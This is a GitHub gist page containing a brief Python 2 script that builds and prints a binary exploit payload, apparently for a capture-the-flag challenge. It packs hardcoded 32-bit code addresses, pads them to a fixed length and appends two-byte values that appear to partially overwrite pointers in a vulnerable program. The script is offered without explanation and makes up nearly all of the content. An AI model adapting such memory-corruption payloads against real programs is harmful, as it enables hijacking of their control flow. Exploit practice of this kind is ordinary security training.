Created
October 24, 2015 09:17
-
-
Save huyna/83a87dba0678c2f28858 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import struct | |
data1 = struct.pack('<i',0x08048883)+'\x00' | |
data1 = data1+'b'*(38-len(data1))+ '\x18\xa0' | |
data2 = struct.pack('<i',0x08048610)+'\x00' | |
data2 = data2+'c'*(38-len(data2))+ '\x24\xa0' | |
print data1+data2 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment